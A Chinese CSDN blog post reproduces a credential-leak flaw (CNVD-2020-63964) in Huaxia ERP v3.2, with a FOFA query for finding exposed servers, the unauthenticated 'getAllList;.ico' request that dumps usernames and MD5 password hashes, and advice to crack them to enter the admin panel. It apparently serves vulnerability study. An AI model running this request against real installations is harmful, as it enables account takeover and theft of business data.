​华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)

最新推荐文章于 2024-05-12 09:33:34 发布
最新推荐文章于 2024-05-12 09:33:34 发布
阅读量714 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 渗透 网络安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131294094
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 华夏ERP简介

华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。

2.漏洞描述

华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息。

3.影响版本

华夏ERP v3.2

4.fofa查询语句

“jshERP-boot”
在这里插入图片描述

5.漏洞复现

漏洞链接:http://127.0.0.1/jshERP-boot/user/getAllList;.ico
漏洞数据包:

GET /jshERP-boot/user/getAllList HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

密码是md5加密的,解密后即可登录后台
在这里插入图片描述
在这里插入图片描述

丢了少年失了心1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
华夏ERP getAllList信息泄露漏洞复现(CVE-2024-0490)
0xSec
01-16 1415
华夏ERP 系统中存在一个问题,被评定为有问题的。该问题影响了文件/user/getAllList的某些未知处理过程。未经身份验证的攻击者可以利用此问题获取后台用户名密码列表。可导致后台被控,漏洞已被公开披露,可能被利用。
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
[漏洞复现]华夏erp账号密码泄露
qq_17754023的博客
06-22 1142
描述华夏 ERP 是一个基于SpringBoot框架和 SaaS模式的系统。华夏 ERP 存在帐号密码泄露漏洞,攻击者可利用该漏洞获取系统所有账号密码从而登录系统进行恶意攻击。目前官方暂未发布安全版本修复漏洞,建议联系厂商获取加固建议。fofa语法:"jshERP-boot"
推荐一款国产ERP系统的瑰宝:华夏ERP
最新发布
gitblog_00079的博客
05-12 510
推荐一款国产ERP系统的瑰宝:华夏ERP 项目地址:https://gitcode.com/jishenghua/jshERP 华夏ERP,一个备受瞩目的国产ERP系统,正以其简洁高效的设计理念,在行业内赢得赞誉。虽然目前以进销存+财务+生产的核心功能为主,但未来的扩展性让人们对它充满期待。现在,让我们一起深入了解这款开源软件的魅力。 1. 项目介绍 华夏ERP旨在为中小企业提供经济实用的信息化解...
华夏ERP存在泄露用户名密码敏感漏洞复现
m0_49025459的博客
07-18 549
密码是MD5加密的,我们只需要正常的去解密,然后输入账号密码即可。
华夏ERP信息泄露
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-06 518
华夏ERP是一种企业资源规划(ERP)软件,旨在为企业提供全面的信息管理和集成解决方案,以提高效率、降低成本并优化业务流程。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口,恶意攻击者可通过调用该接口,对用户的账号和密码进行非授权访问,在获取到账号和密码后,恶意攻击者可接管后台。定期备份和灾难恢复计划:定期备份敏感信息,并建立有效的灾难恢复计划,以便在数据泄露事件发生时能够快速恢复数据。定期更新和修补软件漏洞:及时更新和修补系统和应用程序的漏洞,以减少攻击者利用漏洞获取敏感信息的可能性。
华夏ERP存在泄露用户名密码敏感漏洞CNVD-2020-63964
nnn2188185的博客
06-16 1437
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息。
华夏ERP账号密码泄露漏+RCE
weixin_62352348的博客
01-18 629
华夏ERP账号密码泄露漏+RCE
Apache Tomcat 文件包含漏洞CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
saucer-man#wiki#1039家校通 万能密码绕过 CNVD-2020-314941
07-25
1039家校通 万能密码绕过 CNVD-2020-31494漏洞描述北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生
华夏ERP-企业资源计划
11-07
华夏ERP立志为中小企业提供开源好用的ERP软件,降低企业的信息化成本,目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面,精确到每个按钮和菜单。本系统演示地址:http://47.94.167.52:8080,账号:jsh,密码:123456
华夏ERP_v2.3.1最新版SQL与RCE的审计过程1
08-03
前言认证绕过华夏ERP_v2.3.1最新版SQL与RCE的审计过程1.6. public class LogCostFilter implements Filt
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
ERP 平台Sage X3被曝多个严重漏洞,系统可遭接管,存在潜在供应链风险
smellycat000的专栏
07-09 471
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也...
ERP 管理软件系统存在任意文件读取漏洞
weixin_68647219的博客
08-01 3747
ERP 管理软件系统任意文件读取高危漏洞,该漏洞是由于对用户查看或下载的文件不做限制,可能导致读取配置信息甚至系统重要文件。严重的话,就可能导致SSRF,进而漫游至内网。
「Java代码审计」华夏ERP3.0代码审计
qq_50854662的博客
10-13 778
「Java代码审计」华夏ERP3.0代码审计
华夏账号密码信息泄露漏洞-漏洞复现
weixin_43167326的博客
01-20 458
jshERP立志为中小企业提供开源好用的。
cnvd-2020-10487-tomcat-ajp-lfi
10-21
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值